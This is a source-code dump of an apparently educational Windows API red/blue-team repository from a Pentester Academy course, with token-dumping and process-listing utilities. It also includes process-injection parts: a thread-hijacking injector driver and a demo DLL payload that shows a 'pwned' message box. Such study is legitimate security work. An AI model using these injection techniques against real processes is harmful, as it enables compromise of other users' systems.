├── Process Injection ├── MessageBox │ ├── framework.h │ ├── pch.cpp │ ├── dllmain.cpp │ ├── pch.h │ └── MessageBox.vcxproj.filters ├── Thread Hijacking │ ├── process_utils.h │ ├── Source.cpp │ ├── pch.h │ ├── Thread Hijacking.vcxproj.filters │ ├── process_utils.cpp │ └── Thread Hijacking.vcxproj ├── CreateRemoteThread DLL │ ├── pch.h │ ├── CreateRemoteThread DLL.vcxproj.filters │ ├── Source.cpp │ └── CreateRemoteThread DLL.vcxproj ├── AlertableSleep │ ├── AlertableSleep.vcxproj.filters │ ├── Source.c │ └── AlertableSleep.vcxproj ├── EarlyBird APC │ ├── EarlyBird APC.vcxproj.filters │ ├── Source.cpp │ └── EarlyBird APC.vcxproj ├── CreateRemoteThread Shellcode │ ├── CreateRemoteThread Shellcode.vcxproj.filters │ ├── Source.cpp │ └── CreateRemoteThread Shellcode.vcxproj ├── APC Thread Injection │ ├── APC Thread Injection.vcxproj.filters │ ├── process_utils.h │ ├── Source.cpp │ └── APC Thread Injection.vcxproj └── Process Injection.sln ├── README.md ├── Token Dump ├── Token Dump │ ├── pch.h │ ├── TokenSessionId.h │ ├── TokenRestriction.h │ ├── TokenSandBoxInert.h │ ├── TokenSource.h │ ├── ErrorHandling.h │ ├── ProcessDetails.h │ ├── TokenUser.h │ ├── TokenPrimaryGroup.h │ ├── TokenOwner.h │ ├── TokenGroup.h │ ├── Source.cpp │ ├── TokenElevation.h │ ├── TokenType.h │ ├── TokenStatistics.h │ ├── TokenPrivilege.h │ ├── Utils.h │ ├── ElevationHelp.h │ └── Token Dump.vcxproj.filters └── Token Dump.sln ├── Process ReadWrite ├── Victim Process │ ├── Victim Process.vcxproj.filters │ ├── Source.cpp │ └── Victim Process.vcxproj ├── Attacker RW │ ├── Attacker RW.vcxproj.filters │ ├── Source.cpp │ ├── pch.h │ └── Attacker RW.vcxproj └── Process ReadWrite.sln ├── LICENSE └── Process Listing ├── PS Api ├── PS Api.vcxproj.filters ├── pch.h ├── Source.cpp └── PS Api.vcxproj ├── WTS Api ├── WTS Api.vcxproj.filters ├── Source.cpp ├── pch.h └── WTS Api.vcxproj ├── Tool Help32 Api ├── Tool Help32 Api.vcxproj.filters ├── Source.cpp └── Tool Help32 Api.vcxproj ├── NT Query System Api ├── NT System Query.vcxproj.filters ├── pch.h ├── Source.cpp └── NT System Query.vcxproj └── Process Listing.sln /Process Injection/MessageBox/framework.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 4 | // Windows Header Files 5 | #include 6 | -------------------------------------------------------------------------------- /Process Injection/MessageBox/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to the pre-compiled header 2 | 3 | #include "pch.h" 4 | 5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed. 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WinAPI-RedBlue 2 | Source codes of Windows API Exploitation for Red and Blue teams from Pentester Academy. 3 | 4 | In this I will include my own research learning I have put through learning Win32 API exploitation from Vivek sir and Pavel sir. 5 | 6 | I have organized these learning into "Exploiting Windows API for Red Teaming" series on my blog → https://tbhaxor.com/exploiting-windows-api-for-red-teaming/ 7 | 8 | ## Contact Me 9 | 10 | Email: tbhaxor@pm.me -------------------------------------------------------------------------------- /Process Injection/MessageBox/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "pch.h" 3 | 4 | BOOL APIENTRY DllMain(HMODULE hModule, 5 | DWORD ul_reason_for_call, 6 | LPVOID lpReserved 7 | ) { 8 | switch (ul_reason_for_call) { 9 | case DLL_PROCESS_ATTACH: 10 | MessageBox(NULL, TEXT("Your system is pwned!"), TEXT("Pwned!"), MB_ICONWARNING | MB_OK); 11 | ExitThread(0); 12 | break; 13 | case DLL_THREAD_ATTACH: 14 | case DLL_THREAD_DETACH: 15 | case DLL_PROCESS_DETACH: 16 | break; 17 | } 18 | return TRUE; 19 | } 20 | 21 | -------------------------------------------------------------------------------- /Token Dump/Token Dump/pch.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ErrorHandling.h" 4 | #include "ElevationHelp.h" 5 | #include "Utils.h" 6 | 7 | 8 | #include "ProcessDetails.h" 9 | #include "TokenUser.h" 10 | #include "TokenGroup.h" 11 | #include "TokenPrivilege.h" 12 | #include "TokenOwner.h" 13 | #include "TokenPrimaryGroup.h" 14 | #include "TokenSource.h" 15 | #include "TokenType.h" 16 | #include "TokenElevation.h" 17 | #include "TokenRestriction.h" 18 | #include "TokenSessionId.h" 19 | #include "TokenStatistics.h" 20 | #include "TokenSandBoxInert.h" 21 | 22 | #pragma comment(lib, "Advapi32.lib") 23 | #pragma comment(lib, "Kernel32.lib") 24 | -------------------------------------------------------------------------------- /Process Injection/MessageBox/pch.h: -------------------------------------------------------------------------------- 1 | // pch.h: This is a precompiled header file. 2 | // Files listed below are compiled only once, improving build performance for future builds. 3 | // This also affects IntelliSense performance, including code completion and many code browsing features. 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds. 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage. 6 | 7 | #ifndef PCH_H 8 | #define PCH_H 9 | 10 | // add headers that you want to pre-compile here 11 | #include "framework.h" 12 | #include 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /Process Injection/Thread Hijacking/process_utils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | constexpr SIZE_T PAGE_SIZE = 1 << 12; 7 | 8 | /// 9 | /// Get the first accesible thread for the process 10 | /// 11 | /// Process ID 12 | /// Valid thread handle or NULL 13 | HANDLE GetFirstThead(DWORD dwPID); 14 | 15 | /// 16 | /// 17 | /// 18 | /// 19 | /// 20 | /// TRUE if the injection is successful 21 | 22 | BOOL DoInjection(HANDLE hProcess, HANDLE hThread, LPCSTR lpDllPath); -------------------------------------------------------------------------------- /Process Injection/Thread Hijacking/Source.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | #include "process_utils.h" 3 | 4 | INT main(INT argc, CHAR** argv) { 5 | if (argc < 3) { 6 | std::cerr << "usage: " << argv[0] << " PID DLL_PATH\n"; 7 | return 0x1; 8 | } 9 | 10 | std::cout << "Process ID: " << argv[1] << std::endl; 11 | DWORD dwPID = atoi(argv[1]); 12 | 13 | HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwPID); 14 | if (hProcess == nullptr) { 15 | PrintError("OpenProcess()", TRUE); 16 | } 17 | 18 | HANDLE hThread = GetFirstThead(dwPID); 19 | if (hThread == NULL) { 20 | PrintError("GetFirstThead()", TRUE); 21 | } 22 | 23 | if (!DoInjection(hProcess, hThread, argv[2])) { 24 | PrintError("DoInjection()", TRUE); 25 | } 26 | 27 | std::cout << "Injected!\n"; 28 | 29 | return 0x0; 30 | } -------------------------------------------------------------------------------- /Process Injection/Thread Hijacking/pch.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | /// 8 | /// Print the human-readable error message cause while execution of the function and exit if TRUE 9 | /// 10 | /// Function name caused error 11 | /// Whether to exit after printing error or not (TRUE/FALSE) 12 | VOID PrintError(LPCSTR lpFunction, BOOL bExit = FALSE) { 13 | DWORD dwErrorCode = GetLastError(); 14 | 15 | std::cout << "[" << dwErrorCode << "] " << lpFunction << ": "; 16 | if (dwErrorCode == 0x0) { 17 | std::cout << "Undefined error\n"; 18 | } else { 19 | std::cout << std::system_category().message(dwErrorCode) << std::endl; 20 | } 21 | 22 | if (bExit) { 23 | ExitProcess(1); 24 | } 25 | } -------------------------------------------------------------------------------- /Process Injection/CreateRemoteThread DLL/pch.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | /// 8 | /// Print the human-readable error message cause while execution of the function and exit if TRUE 9 | /// 10 | /// Function name caused error 11 | /// Whether to exit after printing error or not (TRUE/FALSE) 12 | VOID PrintError(LPCSTR lpFunction, BOOL bExit = FALSE) { 13 | DWORD dwErrorCode = GetLastError(); 14 | 15 | std::cout << "[" << dwErrorCode << "] " << lpFunction << ": "; 16 | if (dwErrorCode == 0x0) { 17 | std::cout << "Undefined error\n"; 18 | } else { 19 | std::cout << std::system_category().message(dwErrorCode) << std::endl; 20 | } 21 | 22 | if (bExit) { 23 | ExitProcess(1); 24 | } 25 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenSessionId.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | 4 | #include "Utils.h" 5 | #include "ErrorHandling.h" 6 | 7 | /// 8 | /// Get the information of the login session associated with the token 9 | /// 10 | /// HANDLE of the token 11 | VOID PrintTokenSessionId(HANDLE hTok) { 12 | DWORD dwTokLen = GetTokenInfoLength(hTok, TokenSessionId); 13 | DWORD dwRetLen; 14 | 15 | LPDWORD lpSessionId = (LPDWORD)VirtualAlloc(nullptr, dwTokLen, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 16 | 17 | if (!GetTokenInformation(hTok, TokenSessionId, lpSessionId, dwTokLen, &dwRetLen)) { 18 | PrintError(L"GetTokenInformation()", FALSE); 19 | } else { 20 | std::wcout << L"[+] Logon Session ID: " << *lpSessionId << std::endl; 21 | } 22 | 23 | VirtualFree(lpSessionId, 0x0, MEM_RELEASE); 24 | lpSessionId = nullptr; 25 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenRestriction.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Utils.h" 4 | #include "ErrorHandling.h" 5 | 6 | /// 7 | /// Print whether the token is every filtered or has some restrictions 8 | /// 9 | /// HANDLE of token 10 | VOID PrintTokenIsRestricted(HANDLE hTok) { 11 | DWORD dwTokLen = GetTokenInfoLength(hTok, TokenHasRestrictions); 12 | DWORD dwRetLen; 13 | 14 | LPDWORD lpHasRestriction = (LPDWORD)VirtualAlloc(nullptr, dwTokLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 15 | if (!GetTokenInformation(hTok, TokenHasRestrictions, (LPVOID)lpHasRestriction, dwTokLen, &dwRetLen)) { 16 | PrintError(L"GetTokenInformation()"); 17 | return; 18 | } 19 | 20 | if (*lpHasRestriction) { 21 | std::wcout << L"[+] Is Token Restricted: Yes\n"; 22 | } else { 23 | std::wcout << L"[+] Is Token Restricted: No\n"; 24 | } 25 | 26 | VirtualFree(lpHasRestriction, 0x0, MEM_RELEASE); 27 | lpHasRestriction = nullptr; 28 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenSandBoxInert.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Utils.h" 4 | #include "ErrorHandling.h" 5 | 6 | /// 7 | /// Get the information for whether or not sandboxing of processes is disabled or enabled 8 | /// 9 | /// HANDLE of the token 10 | VOID PrintTokenSandboxInert(HANDLE hTok) { 11 | DWORD dwTokLen = GetTokenInfoLength(hTok, TokenSandBoxInert); 12 | DWORD dwRetLen; 13 | 14 | LPDWORD lpSandBoxInert = (LPDWORD)VirtualAlloc(nullptr, dwTokLen, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 15 | 16 | if (!GetTokenInformation(hTok, TokenSandBoxInert, lpSandBoxInert, dwTokLen, &dwRetLen)) { 17 | PrintError(L"GetTokenInformation()", FALSE); 18 | } else if (*lpSandBoxInert) { 19 | std::wcout << L"[+] Sandbox Inert: Exists in Token\n"; 20 | } else { 21 | std::wcout << L"[+] Sandbox Inert: Does not exists in Token\n"; 22 | } 23 | 24 | VirtualFree(lpSandBoxInert, 0x0, MEM_RELEASE); 25 | lpSandBoxInert = nullptr; 26 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenSource.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Utils.h" 4 | #include "ErrorHandling.h" 5 | 6 | /// 7 | /// Print the details of source of this token 8 | /// 9 | /// HANDLE of token 10 | VOID PrintTokenSource(HANDLE hTok) { 11 | DWORD dwTokLen = GetTokenInfoLength(hTok, TokenSource); 12 | DWORD dwRetLen; 13 | 14 | PTOKEN_SOURCE ts = (PTOKEN_SOURCE)VirtualAlloc(nullptr, dwTokLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 15 | if (!GetTokenInformation(hTok, TokenSource, (LPVOID)ts, dwTokLen, &dwRetLen)) { 16 | PrintError(L"GetTokenInformation()"); 17 | return; 18 | } 19 | 20 | std::cout << "[+] Token Source " << std::endl; 21 | std::cout << "\tSource Name: " << ts->SourceName << std::endl; 22 | std::cout << "\tSource ID: " << std::hex << std::uppercase << ts->SourceIdentifier.HighPart << "-" << ts->SourceIdentifier.LowPart << std::nouppercase << std::dec << std::endl; 23 | 24 | VirtualFree(ts, 0x0, MEM_RELEASE); 25 | ts = nullptr; 26 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/ErrorHandling.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | /// 8 | /// Format the error message and print the human-readable message from GetLastError() 9 | /// 10 | /// Name of the function 11 | /// Whether to exit the program after displaying error message of not. By default it is FALSE 12 | VOID PrintError(LPCWSTR lpFunctionName, BOOL bExit = FALSE) { 13 | // Get the latest error id 14 | DWORD ErrId = GetLastError(); 15 | std::wcout << L"[ERR:" << ErrId << L"] " << lpFunctionName << L": "; 16 | 17 | // Pring the error message based on the response 18 | if (ErrId == 0) { 19 | std::wcout << L"Something went wrong"; 20 | } else { 21 | std::cout << std::system_category().message(ErrId); 22 | } 23 | 24 | std::wcout << std::endl; 25 | 26 | // If exit flag is set, quit application with error return code 27 | if (bExit) { 28 | exit(1); 29 | } 30 | } -------------------------------------------------------------------------------- /Process Injection/AlertableSleep/AlertableSleep.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Process ReadWrite/Victim Process/Victim Process.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Gurkirat Singh 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Process Listing/PS Api/PS Api.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /Process Listing/WTS Api/WTS Api.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /Process ReadWrite/Attacker RW/Attacker RW.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /Process Listing/Tool Help32 Api/Tool Help32 Api.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /Process Listing/NT Query System Api/NT System Query.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /Process Injection/CreateRemoteThread DLL/CreateRemoteThread DLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /Process Injection/EarlyBird APC/EarlyBird APC.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /Process Injection/CreateRemoteThread Shellcode/CreateRemoteThread Shellcode.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /Token Dump/Token Dump/ProcessDetails.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "ErrorHandling.h" 3 | #include 4 | #include 5 | 6 | /// 7 | /// Print the basic details of the process. 8 | /// 9 | /// Process ID 10 | VOID PrintBasicProcessDetails(DWORD dwPID) { 11 | HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0x0); 12 | 13 | PROCESSENTRY32W pe; 14 | pe.dwSize = sizeof(PROCESSENTRY32W); 15 | DWORD dwPPID, dwThreads; 16 | PWCHAR szExeFile = (PWCHAR)VirtualAlloc(NULL, 260, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 17 | 18 | if (!Process32FirstW(hSnap, &pe)) { 19 | PrintError(L"Process32FirstW()"); 20 | } else { 21 | do { 22 | if (pe.th32ProcessID == dwPID) { 23 | dwPPID = pe.th32ParentProcessID; 24 | dwThreads = pe.cntThreads; 25 | szExeFile = pe.szExeFile; 26 | break; 27 | } 28 | } while (Process32NextW(hSnap, &pe)); 29 | } 30 | 31 | 32 | std::wcout << L"[+] Basic Process Details" << std::endl; 33 | std::wcout << L"\tProcess ID: " << dwPID << std::endl; 34 | std::wcout << L"\tParent Process ID: " << dwPPID << std::endl; 35 | std::wcout << L"\tProcess Name: " << szExeFile << std::endl; 36 | 37 | VirtualFree(szExeFile, 260, MEM_RELEASE); 38 | szExeFile = NULL; 39 | } -------------------------------------------------------------------------------- /Process Listing/Tool Help32 Api/Source.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | #include 3 | 4 | 5 | int wmain() { 6 | // Add the SeDebugPrivilege if available or continue unprivilege process 7 | if (!AddSeDebugPrivileges()) { 8 | SpawnElevatedProcess(); 9 | } 10 | 11 | // Get snapshot of all the processes 12 | HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0x0); 13 | if (hSnapShot == INVALID_HANDLE_VALUE) { 14 | PrintError("CreateToolhelp32Snapshot()", TRUE); 15 | } 16 | PROCESSENTRY32 pe; 17 | pe.dwSize = sizeof(PROCESSENTRY32); 18 | Process32First(hSnapShot, &pe); 19 | 20 | // Iterate over all the processes and get the next entry from Process32Next 21 | do { 22 | std::wcout << L"PID: " << pe.th32ProcessID << L"\tParent PID: " << pe.th32ParentProcessID << std::endl; 23 | std::wcout << L"# Threads: " << pe.cntThreads << L"\tProcess Name: " << pe.szExeFile << std::endl; 24 | 25 | // Print list of all the threads 26 | ListProcessThreads(pe.th32ProcessID); 27 | 28 | // Print list of all the modules 29 | ListProcessModules(pe.th32ProcessID); 30 | 31 | std::wcout << L"------------------------------------------------------" << std::endl; 32 | } while (Process32Next(hSnapShot, &pe)); 33 | 34 | // Close handle and release memory 35 | CloseHandle(hSnapShot); 36 | hSnapShot = NULL; 37 | 38 | return 0; 39 | } -------------------------------------------------------------------------------- /Process Injection/APC Thread Injection/APC Thread Injection.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /Process Injection/MessageBox/MessageBox.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenUser.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Utils.h" 4 | #include "ErrorHandling.h" 5 | 6 | /// 7 | /// Print the details of the User associated with the token user 8 | /// 9 | /// 10 | VOID PrintTokenUser(HANDLE hTok) { 11 | DWORD dwTokLength = GetTokenInfoLength(hTok, TokenUser); 12 | DWORD dwRetLen; 13 | 14 | PTOKEN_USER tu = (PTOKEN_USER)VirtualAlloc(NULL, dwTokLength, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 15 | if (tu == nullptr) { 16 | PrintError(L"VirtualAlloc()"); 17 | return; 18 | } 19 | std::wcout << L"[+] User Details" << std::endl; 20 | if (!GetTokenInformation(hTok, TokenUser, (LPVOID)tu, dwTokLength, &dwRetLen)) { 21 | PrintError(L"GetTokenInformation()"); 22 | return; 23 | } 24 | 25 | LPWSTR lpSid = SIDSerialize(tu->User.Sid); 26 | if (lpSid == nullptr) { 27 | PrintError(L"SIDSerialize()"); 28 | } else { 29 | std::wcout << L"\tSID: " << lpSid << std::endl; 30 | } 31 | LocalFree(lpSid); 32 | lpSid = nullptr; 33 | 34 | WCHAR wAcc[MAX_PATH], wDom[MAX_PATH]; 35 | SID_NAME_USE eSidType; 36 | if (!GetDomainAccount(tu->User.Sid, wAcc, wDom, &eSidType)) { 37 | PrintError(L"GetDomainAccount()"); 38 | } else { 39 | std::wcout << L"\tDomain\\Account (Type): " << wDom << L"\\" << wAcc << L" (" << GetSidType(eSidType) << L")" << std::endl; 40 | } 41 | 42 | VirtualFree(tu, 0x0, MEM_RELEASE); 43 | tu = nullptr; 44 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/TokenPrimaryGroup.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "ErrorHandling.h" 3 | #include "Utils.h" 4 | 5 | /// 